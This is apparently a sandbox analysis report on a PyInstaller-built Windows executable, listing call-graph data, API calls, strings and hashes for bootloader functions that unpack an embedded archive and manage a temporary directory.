18894->17332 18896 7ff7ca796ef3 GetProcAddress 18895->18896 18897 7ff7ca796ec9 18895->18897 18896->18897 18961 7ff7ca795b05 18960->18961 18962 7ff7ca791bf0 49 API calls 18961->18962 18963 7ff7ca795b41 18962->18963 18964 7ff7ca795b4a 18963->18964 18965 7ff7ca795b6d 18963->18965 18967 7ff7ca7925f0 53 API calls 18964->18967 18966 7ff7ca793fe0 49 API calls 18965->18966 18969 7ff7ca795b85 18966->18969 18968 7ff7ca795b63 18967->18968 18973 7ff7ca79b870 _log10_special 8 API calls 18968->18973 18970 7ff7ca795ba3 18969->18970 18971 7ff7ca7925f0 53 API calls 18969->18971 18972 7ff7ca793f10 10 API calls 18970->18972 18971->18970 18974 7ff7ca795bad 18972->18974 18975 7ff7ca79308e 18973->18975 18976 7ff7ca795bbb 18974->18976 18977 7ff7ca7981a0 3 API calls 18974->18977 18975->17372 18991 7ff7ca795c80 18975->18991 18978 7ff7ca793fe0 49 API calls 18976->18978 18977->18976 18979 7ff7ca795bd4 18978->18979 18980 7ff7ca795bf9 18979->18980 18981 7ff7ca795bd9 18979->18981 18982 7ff7ca7981a0 3 API calls 18980->18982 18983 7ff7ca7925f0 53 API calls 18981->18983 18983->18968 19130 7ff7ca794c80 18991->19130 18993 7ff7ca795cba 19131 7ff7ca794cac 19130->19131 19132 7ff7ca794cb4 19131->19132 19133 7ff7ca794e54 19131->19133 19168 7ff7ca7a5db4 19131->19168 19132->18993 19134 7ff7ca795017 __std_exception_copy 19133->19134 19135 7ff7ca794180 47 API calls 19133->19135 19134->18993 19135->19133 19169 7ff7ca7a5de4 19168->19169 19172 7ff7ca7a52b0 19169->19172 19233->17375 20034 7ff7ca79be70 20035 7ff7ca79be80 20034->20035 20051 7ff7ca7a8ec0 20035->20051 20037 7ff7ca79be8c 20057 7ff7ca79c168 20037->20057 20039 7ff7ca79c44c 7 API calls 20041 7ff7ca79bf25 20039->20041 20040 7ff7ca79bea4 _RTC_Initialize 20049 7ff7ca79bef9 20040->20049 20062 7ff7ca79c318 20040->20062 20043 7ff7ca79beb9 20065 7ff7ca7a832c 20043->20065 20049->20039 20050 7ff7ca79bf15 20049->20050 20052 7ff7ca7a8ed1 20051->20052 20053 7ff7ca7a43f4 _get_daylight 11 API calls 20052->20053 20056 7ff7ca7a8ed9 20052->20056 20054 7ff7ca7a8ee8 20053->20054 20055 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 20054->20055 20055->20056 20056->20037 20058 7ff7ca79c179 20057->20058 20061 7ff7ca79c17e __scrt_acquire_startup_lock 20057->20061 20059 7ff7ca79c44c 7 API calls 20058->20059 20058->20061 20060 7ff7ca79c1f2 20059->20060 20061->20040 20090 7ff7ca79c2dc 20062->20090 20064 7ff7ca79c321 20064->20043 20066 7ff7ca79bec5 20065->20066 20067 7ff7ca7a834c 20065->20067 20066->20049 20089 7ff7ca79c3ec InitializeSListHead 20066->20089 20068 7ff7ca7a8354 20067->20068 20069 7ff7ca7a836a GetModuleFileNameW 20067->20069 20070 7ff7ca7a43f4 _get_daylight 11 API calls 20068->20070 20073 7ff7ca7a8395 20069->20073 20071 7ff7ca7a8359 20070->20071 20072 7ff7ca7a9bf0 _invalid_parameter_noinfo 37 API calls 20071->20072 20072->20066 20105 7ff7ca7a82cc 20073->20105 20076 7ff7ca7a83dd 20077 7ff7ca7a43f4 _get_daylight 11 API calls 20076->20077 20078 7ff7ca7a83e2 20077->20078 20081 7ff7ca7a9c58 __free_lconv_mon 11 API calls 20078->20081 20079 7ff7ca7a8417 20082 7ff7ca7a9c58 __free_lconv_mon 11 API calls 20079->20082 20080 7ff7ca7a83f5 20080->20079 20083 7ff7ca7a8443 20080->20083 20084 7ff7ca7a845c 20080->20084 20081->20066 20082->20066 20085 7ff7ca7a9c58 __free_lconv_mon 11 API calls 20083->20085 20087 7ff7ca7a9c58 __free_lconv_mon 11 API calls 20084->20087 20086 7ff7ca7a844c 20085->20086 20088 7ff7ca7a9c58 __free_lconv_mon 11 API calls 20086->20088 20087->20079 20088->20066 20091 7ff7ca79c2f6 20090->20091 20093 7ff7ca79c2ef 20090->20093 20094 7ff7ca7a94fc 20091->20094 20093->20064 20097 7ff7ca7a9138 20094->20097 20104 7ff7ca7af5e8 EnterCriticalSection 20097->20104 20106 7ff7ca7a831c 20105->20106 20107 7ff7ca7a82e4 20105->20107 20106->20076 20106->20080 20107->20106 20108 7ff7ca7adea8 _get_daylight 11 API calls 20107->20108 20109 7ff7ca7a8312 20108->20109 20110 7ff7ca7a9c58 __free_lconv_mon 11 API calls 20109->20110 20110->20106 19774 7ff7ca7b9ef3 19776 7ff7ca7b9f03 19774->19776 19778 7ff7ca7a4788 LeaveCriticalSection 19776->19778 15755 7ff7ca79ae00 15756 7ff7ca79ae2e 15755->15756 15757 7ff7ca79ae15 15755->15757 15757->15756 15760 7ff7ca7ac90c 15757->15760 15761 7ff7ca7ac957 15760->15761 15766 7ff7ca7ac91b _get_daylight 15760->15766 15770 7ff7ca7a43f4 15761->15770 15763 7ff7ca7ac93e HeapAlloc 15764 7ff7ca79ae8e 15763->15764 15763->15766 15766->15761 15766->15763 15767 7ff7ca7b28a0 15766->15767 15773 7ff7ca7b28e0 15767->15773 15779 7ff7ca7aa5d8 GetLastError 15770->15779 15772 7ff7ca7a43fd 15772->15764 15778 7ff7ca7af5e8 EnterCriticalSection 15773->15778 15780 7ff7ca7aa619 FlsSetValue 15779->15780 15785 7ff7ca7aa5fc 15779->15785 15781 7ff7ca7aa609 SetLastError 15780->15781 15782 7ff7ca7aa62b 15780->15782 15781->15772 15796 7ff7ca7adea8 15782->15796 15785->15780 15785->15781 15787 7ff7ca7aa658 FlsSetValue 15790 7ff7ca7aa676 15787->15790 15791 7ff7ca7aa664 FlsSetValue 15787->15791 15788 7ff7ca7aa648 FlsSetValue 15789 7ff7ca7aa651 15788->15789 15803 7ff7ca7a9c58 15789->15803 15809 7ff7ca7aa204 15790->15809 15791->15789 15797 7ff7ca7adeb9 _get_daylight 15796->15797 15798 7ff7ca7adeee HeapAlloc 15797->15798 15799 7ff7ca7adf0a 15797->15799 15802 7ff7ca7b28a0 _get_daylight 2 API calls 15797->15802 15798->15797 15801 7ff7ca7aa63a 15798->15801 15800 7ff7ca7a43f4 _get_daylight 10 API calls 15799->15800 15800->15801 15801->15787 15801->15788 15802->15797 15804 7ff7ca7a9c8c 15803->15804 15805 7ff7ca7a9c5d RtlFreeHeap 15803->15805 15804->15781 15805->15804 15806 7ff7ca7a9c78 GetLastError 15805->15806 15807 7ff7ca7a9c85 __free_lconv_mon 15806->15807 15808 7ff7ca7a43f4 _get_daylight 9 API calls 15807->15808 15808->15804 15814 7ff7ca7aa0dc 15809->15814 15826 7ff7ca7af5e8 EnterCriticalSection 15814->15826 16210 7ff7ca7a8c79 16222 7ff7ca7a96e8 16210->16222 16223 7ff7ca7aa460 __GetCurrentState 45 API calls 16222->16223 16224 7ff7ca7a96f1 16223->16224 16225 7ff7ca7a9814 __GetCurrentState 45 API calls 16224->16225 16226 7ff7ca7a9711 16225->16226 20276 7ff7ca7ba079 20279 7ff7ca7a4788 LeaveCriticalSection 20276->20279 19868 7ff7ca7ba10e 19869 7ff7ca7ba127 19868->19869 19870 7ff7ca7ba11d 19868->19870 19872 7ff7ca7af648 LeaveCriticalSection 19870->19872

                                                                                        Executed Functions

                                                                                        Function 00007FF7CA791000 Relevance: 40.6, APIs: 5, Strings: 18, Instructions: 338COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 0 7ff7ca791000-7ff7ca793536 call 7ff7ca79f138 call 7ff7ca79f140 call 7ff7ca79bb70 call 7ff7ca7a4700 call 7ff7ca7a4794 call 7ff7ca7933e0 14 7ff7ca793544-7ff7ca793566 call 7ff7ca7918f0 0->14 15 7ff7ca793538-7ff7ca79353f 0->15 20 7ff7ca793736-7ff7ca79374c call 7ff7ca793f70 14->20 21 7ff7ca79356c-7ff7ca793583 call 7ff7ca791bf0 14->21 16 7ff7ca79371a-7ff7ca793735 call 7ff7ca79b870 15->16 27 7ff7ca793785-7ff7ca79379a call 7ff7ca7925f0 20->27 28 7ff7ca79374e-7ff7ca79377b call 7ff7ca7976a0 20->28 26 7ff7ca793588-7ff7ca7935c1 21->26 29 7ff7ca793653-7ff7ca79366d call 7ff7ca797e10 26->29 30 7ff7ca7935c7-7ff7ca7935cb 26->30 44 7ff7ca793712 27->44 41 7ff7ca79379f-7ff7ca7937be call 7ff7ca791bf0 28->41 42 7ff7ca79377d-7ff7ca793780 call 7ff7ca79f36c 28->42 45 7ff7ca79366f-7ff7ca793675 29->45 46 7ff7ca793695-7ff7ca79369c 29->46 34 7ff7ca793638-7ff7ca79364d call 7ff7ca7918e0 30->34 35 7ff7ca7935cd-7ff7ca7935e5 call 7ff7ca7a4560 30->35 34->29 34->30 54 7ff7ca7935f2-7ff7ca79360a call 7ff7ca7a4560 35->54 55 7ff7ca7935e7-7ff7ca7935eb 35->55 63 7ff7ca7937c1-7ff7ca7937ca 41->63 42->27 44->16 52 7ff7ca793682-7ff7ca793690 call 7ff7ca7a415c 45->52 53 7ff7ca793677-7ff7ca793680 45->53 48 7ff7ca7936a2-7ff7ca7936c0 call 7ff7ca797e10 call 7ff7ca797f80 46->48 49 7ff7ca793844-7ff7ca793863 call 7ff7ca793e90 46->49 78 7ff7ca79380f-7ff7ca79381e call 7ff7ca798400 48->78 79 7ff7ca7936c6-7ff7ca7936c9 48->79 68 7ff7ca793871-7ff7ca793882 call 7ff7ca791bf0 49->68 69 7ff7ca793865-7ff7ca79386f call 7ff7ca793fe0 49->69 52->46 53->52 65 7ff7ca793617-7ff7ca79362f call 7ff7ca7a4560 54->65 66 7ff7ca79360c-7ff7ca793610 54->66 55->54 63->63 70 7ff7ca7937cc-7ff7ca7937e9 call 7ff7ca7918f0 63->70 65->34 83 7ff7ca793631 65->83 66->65 81 7ff7ca793887-7ff7ca7938a1 call 7ff7ca7986b0 68->81 69->81 70->26 82 7ff7ca7937ef-7ff7ca793800 call 7ff7ca7925f0 70->82 93 7ff7ca793820 78->93 94 7ff7ca79382c-7ff7ca79382f call 7ff7ca797c40 78->94 79->78 84 7ff7ca7936cf-7ff7ca7936f6 call 7ff7ca791bf0 79->84 95 7ff7ca7938af-7ff7ca7938c1 SetDllDirectoryW 81->95 96 7ff7ca7938a3 81->96 82->44 83->34 99 7ff7ca793805-7ff7ca79380d call 7ff7ca7a415c 84->99 100 7ff7ca7936fc-7ff7ca793703 call 7ff7ca7925f0 84->100 93->94 106 7ff7ca793834-7ff7ca793836 94->106 97 7ff7ca7938d0-7ff7ca7938ec call 7ff7ca796560 call 7ff7ca796b00 95->97 98 7ff7ca7938c3-7ff7ca7938ca 95->98 96->95 118 7ff7ca793947-7ff7ca79394a call 7ff7ca796510 97->118 119 7ff7ca7938ee-7ff7ca7938f4 97->119 98->97 102 7ff7ca793a50-7ff7ca793a58 98->102 99->81 110 7ff7ca793708-7ff7ca79370a 100->110 111 7ff7ca793a5a-7ff7ca793a77 PostMessageW GetMessageW 102->111 112 7ff7ca793a7d-7ff7ca793aaf call 7ff7ca7933d0 call 7ff7ca793080 call 7ff7ca7933a0 call 7ff7ca796780 call 7ff7ca796510 102->112 106->81 107 7ff7ca793838 106->107 107->49 110->44 111->112 126 7ff7ca79394f-7ff7ca793956 118->126 121 7ff7ca7938f6-7ff7ca793903 call 7ff7ca7965a0 119->121 122 7ff7ca79390e-7ff7ca793918 call 7ff7ca796970 119->122 121->122 133 7ff7ca793905-7ff7ca79390c 121->133 135 7ff7ca793923-7ff7ca793931 call 7ff7ca796cd0 122->135 136 7ff7ca79391a-7ff7ca793921 122->136 126->102 130 7ff7ca79395c-7ff7ca793966 call 7ff7ca7930e0 126->130 130->110 144 7ff7ca79396c-7ff7ca793980 call 7ff7ca7983e0 130->144 139 7ff7ca79393a-7ff7ca793942 call 7ff7ca792870 call 7ff7ca796780 133->139 135->126 145 7ff7ca793933 135->145 136->139 139->118 151 7ff7ca793982-7ff7ca79399f PostMessageW GetMessageW 144->151 152 7ff7ca7939a5-7ff7ca7939e1 call 7ff7ca797f20 call 7ff7ca797fc0 call 7ff7ca796780 call 7ff7ca796510 call 7ff7ca797ec0 144->152 145->139 151->152 162 7ff7ca7939e6-7ff7ca7939e8 152->162 163 7ff7ca7939ea-7ff7ca793a00 call 7ff7ca7981f0 call 7ff7ca797ec0 162->163 164 7ff7ca793a3d-7ff7ca793a4b call 7ff7ca7918a0 162->164 163->164 171 7ff7ca793a02-7ff7ca793a10 163->171 164->110 172 7ff7ca793a31-7ff7ca793a38 call 7ff7ca792870 171->172 173 7ff7ca793a12-7ff7ca793a2c call 7ff7ca7925f0 call 7ff7ca7918a0 171->173 172->164 173->110
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileModuleName
                                                                                        • String ID: Could not create temporary directory!$Could not load PyInstaller's embedded PKG archive from the executable (%s)$Could not side-load PyInstaller's PKG archive from external file (%s)$ERROR: failed to remove temporary directory: %s$Failed to convert DLL search path!$Failed to initialize security descriptor for temporary directory!$Failed to load Tcl/Tk shared libraries for splash screen!$Failed to start splash screen!$Failed to unpack splash screen dependencies from PKG archive!$MEI$PYINSTALLER_STRICT_UNPACK_MODE$Path exceeds PYI_PATH_MAX limit.$WARNING: failed to remove temporary directory: %s$_MEIPASS2$pkg$pyi-contents-directory$pyi-disable-windowed-traceback$pyi-runtime-tmpdir
                                                                                        • API String ID: 514040917-585287483
                                                                                        • Opcode ID: 248bf1bb3e5757b3c8afa9bc96cec25a25ab213719c4b7e86d6d8a609cca38d4
                                                                                        • Instruction ID: 538e011d137946bfc97a864317923fd5f9b93fe68f7a50e41baf04f09b6f111f
                                                                                        • Opcode Fuzzy Hash: 248bf1bb3e5757b3c8afa9bc96cec25a25ab213719c4b7e86d6d8a609cca38d4
                                                                                        • Instruction Fuzzy Hash: 82F1AF61A0868261FA14FF32B474AF9A361BF5C7A2FC440B6DA1D43692EF2CE554C360
                                                                                        Function 00007FF7CA7B5C74 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 335 7ff7ca7b5c74-7ff7ca7b5ce7 call 7ff7ca7b59a8 338 7ff7ca7b5d01-7ff7ca7b5d0b call 7ff7ca7a7830 335->338 339 7ff7ca7b5ce9-7ff7ca7b5cf2 call 7ff7ca7a43d4 335->339 345 7ff7ca7b5d26-7ff7ca7b5d8f CreateFileW 338->345 346 7ff7ca7b5d0d-7ff7ca7b5d24 call 7ff7ca7a43d4 call 7ff7ca7a43f4 338->346 344 7ff7ca7b5cf5-7ff7ca7b5cfc call 7ff7ca7a43f4 339->344 359 7ff7ca7b6042-7ff7ca7b6062 344->359 349 7ff7ca7b5d91-7ff7ca7b5d97 345->349 350 7ff7ca7b5e0c-7ff7ca7b5e17 GetFileType 345->350 346->344 355 7ff7ca7b5dd9-7ff7ca7b5e07 GetLastError call 7ff7ca7a4368 349->355 356 7ff7ca7b5d99-7ff7ca7b5d9d 349->356 352 7ff7ca7b5e19-7ff7ca7b5e54 GetLastError call 7ff7ca7a4368 CloseHandle 350->352 353 7ff7ca7b5e6a-7ff7ca7b5e71 350->353 352->344 370 7ff7ca7b5e5a-7ff7ca7b5e65 call 7ff7ca7a43f4 352->370 362 7ff7ca7b5e73-7ff7ca7b5e77 353->362 363 7ff7ca7b5e79-7ff7ca7b5e7c 353->363 355->344 356->355 357 7ff7ca7b5d9f-7ff7ca7b5dd7 CreateFileW 356->357 357->350 357->355 367 7ff7ca7b5e82-7ff7ca7b5ed7 call 7ff7ca7a7748 362->367 363->367 368 7ff7ca7b5e7e 363->368 373 7ff7ca7b5ef6-7ff7ca7b5f27 call 7ff7ca7b5728 367->373 374 7ff7ca7b5ed9-7ff7ca7b5ee5 call 7ff7ca7b5bb0 367->374 368->367 370->344 381 7ff7ca7b5f29-7ff7ca7b5f2b 373->381 382 7ff7ca7b5f2d-7ff7ca7b5f6f 373->382 374->373 380 7ff7ca7b5ee7 374->380 383 7ff7ca7b5ee9-7ff7ca7b5ef1 call 7ff7ca7a9dd0 380->383 381->383 384 7ff7ca7b5f91-7ff7ca7b5f9c 382->384 385 7ff7ca7b5f71-7ff7ca7b5f75 382->385 383->359 386 7ff7ca7b5fa2-7ff7ca7b5fa6 384->386 387 7ff7ca7b6040 384->387 385->384 389 7ff7ca7b5f77-7ff7ca7b5f8c 385->389 386->387 390 7ff7ca7b5fac-7ff7ca7b5ff1 CloseHandle CreateFileW 386->390 387->359 389->384 392 7ff7ca7b6026-7ff7ca7b603b 390->392 393 7ff7ca7b5ff3-7ff7ca7b6021 GetLastError call 7ff7ca7a4368 call 7ff7ca7a7970 390->393 392->387 393->392
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                        • String ID:
                                                                                        • API String ID: 1617910340-0
                                                                                        • Opcode ID: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                        • Instruction ID: 6798bf5561f63eb413830064ae0e49be6dbe10bc9b9e35f1db636e762b79dfd0
                                                                                        • Opcode Fuzzy Hash: a69f399e4b06a5e248c6b703f60b2f721b94672e004abf856287656fc91ee5b6
                                                                                        • Instruction Fuzzy Hash: FDC1E172B28B4185FB10DF6AE0A06AC7761FB98BA9F801265DE1E5B394CF38D451C310
                                                                                        Function 00007FF7CA7979B0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • FindFirstFileW.KERNELBASE(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797A1B
                                                                                        • RemoveDirectoryW.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797A9E
                                                                                        • DeleteFileW.KERNELBASE(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797ABD
                                                                                        • FindNextFileW.KERNELBASE(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797ACB
                                                                                        • FindClose.KERNEL32(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797ADC
                                                                                        • RemoveDirectoryW.KERNELBASE(?,00007FF7CA797EF9,00007FF7CA7939E6), ref: 00007FF7CA797AE5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                        • String ID: %s\*
                                                                                        • API String ID: 1057558799-766152087
                                                                                        • Opcode ID: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                        • Instruction ID: 80abd8950a2015ed5aae56bb5fd8ae3311cb3c64894ae9b80c3d978894136bca
                                                                                        • Opcode Fuzzy Hash: 37c75c647de740c4d03e434983ba542f23ef98c0d39288f6f50529afbb256bed
                                                                                        • Instruction Fuzzy Hash: 90418121A0C64295FA20BF3AB4649FAA360FB9C776FC40273D95D42694DE3CD6498750
                                                                                        Function 00007FF7CA7985A0 Relevance: 3.0, APIs: 2, Instructions: 29COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: Find$CloseFileFirst
                                                                                        • String ID:
                                                                                        • API String ID: 2295610775-0
                                                                                        • Opcode ID: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                        • Instruction ID: 7809cd8405d3a0183a2d09d59aa69b0bff6986bdcfae487c5cd2646ec74e0990
                                                                                        • Opcode Fuzzy Hash: ca66ee6ee850f25a53d0c9653a43f1313d0231bc46844eb151e3c2d0b1a3e355
                                                                                        • Instruction Fuzzy Hash: 5FF0C822A1874586F7609F71B4A8B66B360FB88739F84033AD97D066D4CF3CD0588B00
                                                                                        Function 00007FF7CA7AFBD8 Relevance: 2.0, APIs: 1, Instructions: 461COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                                                        • String ID:
                                                                                        • API String ID: 1010374628-0
                                                                                        • Opcode ID: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                        • Instruction ID: 5a5cf20f6f4edabc28db81c6b699aad0805ef7908328283c7d62af0bd3845e72
                                                                                        • Opcode Fuzzy Hash: a8238ebacfbb29389201daedac3868d1c225100c6328c8ae619a1fe2ce119bc6
                                                                                        • Instruction Fuzzy Hash: 2402B022A1D74260FA55BF23B8352799284BF1DBB2FC466B5DD6D463D2DE3CA8118330
                                                                                        Function 00007FF7CA7918F0 Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 172COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 179 7ff7ca7918f0-7ff7ca79192b call 7ff7ca793f70 182 7ff7ca791bc1-7ff7ca791be5 call 7ff7ca79b870 179->182 183 7ff7ca791931-7ff7ca791971 call 7ff7ca7976a0 179->183 188 7ff7ca791977-7ff7ca791987 call 7ff7ca79f9f4 183->188 189 7ff7ca791bae-7ff7ca791bb1 call 7ff7ca79f36c 183->189 194 7ff7ca7919a1-7ff7ca7919bd call 7ff7ca79f6bc 188->194 195 7ff7ca791989-7ff7ca79199c call 7ff7ca792760 188->195 193 7ff7ca791bb6-7ff7ca791bbe 189->193 193->182 200 7ff7ca7919bf-7ff7ca7919d2 call 7ff7ca792760 194->200 201 7ff7ca7919d7-7ff7ca7919ec call 7ff7ca7a4154 194->201 195->189 200->189 206 7ff7ca791a06-7ff7ca791a87 call 7ff7ca791bf0 * 2 call 7ff7ca79f9f4 201->206 207 7ff7ca7919ee-7ff7ca791a01 call 7ff7ca792760 201->207 215 7ff7ca791a8c-7ff7ca791a9f call 7ff7ca7a4170 206->215 207->189 218 7ff7ca791aa1-7ff7ca791ab4 call 7ff7ca792760 215->218 219 7ff7ca791ab9-7ff7ca791ad2 call 7ff7ca79f6bc 215->219 218->189 224 7ff7ca791ad4-7ff7ca791ae7 call 7ff7ca792760 219->224 225 7ff7ca791aec-7ff7ca791b08 call 7ff7ca79f430 219->225 224->189 230 7ff7ca791b0a-7ff7ca791b16 call 7ff7ca7925f0 225->230 231 7ff7ca791b1b-7ff7ca791b29 225->231 230->189 231->189 233 7ff7ca791b2f-7ff7ca791b3e 231->233 235 7ff7ca791b40-7ff7ca791b46 233->235 236 7ff7ca791b60-7ff7ca791b6f 235->236 237 7ff7ca791b48-7ff7ca791b55 235->237 236->236 238 7ff7ca791b71-7ff7ca791b7a 236->238 237->238 239 7ff7ca791b8f 238->239 240 7ff7ca791b7c-7ff7ca791b7f 238->240 242 7ff7ca791b91-7ff7ca791bac 239->242 240->239 241 7ff7ca791b81-7ff7ca791b84 240->241 241->239 243 7ff7ca791b86-7ff7ca791b89 241->243 242->189 242->235 243->239 244 7ff7ca791b8b-7ff7ca791b8d 243->244 244->242
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000006.00000002.2288359854.00007FF7CA791000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7CA790000, based on PE: true
                                                                                        • Associated: 00000006.00000002.2288309521.00007FF7CA790000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288399563.00007FF7CA7BB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7CE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288442383.00007FF7CA7D4000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                        • Associated: 00000006.00000002.2288515262.00007FF7CA7D6000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_6_2_7ff7ca790000_tmp8AEF.jbxd
                                                                                        Similarity
                                                                                        • API ID: _fread_nolock$Message
                                                                                        • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                        • API String ID: 677216364-3497178890
                                                                                        • Opcode ID: c60f31d90617da9bd6efd05d10818b0c471ae56f5d8722fb5927d0269e83daa3
                                                                                        • Instruction ID: 97c684da1bd20317123bda7fa7aab4def5129d99004653001d8efda2abe0edd6
                                                                                        • Opcode Fuzzy Hash: c60f31d90617da9bd6efd05d10818b0c471ae56f5d8722fb5927d0269e83daa3
                                                                                        • Instruction Fuzzy Hash: 0671E871B0878285FB60EF36F460AB9A391FB8C7A6F804076DD8D47759EE2CE5448760
                                                                                        Function 00007FF7CA7915C0 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 137COMMON
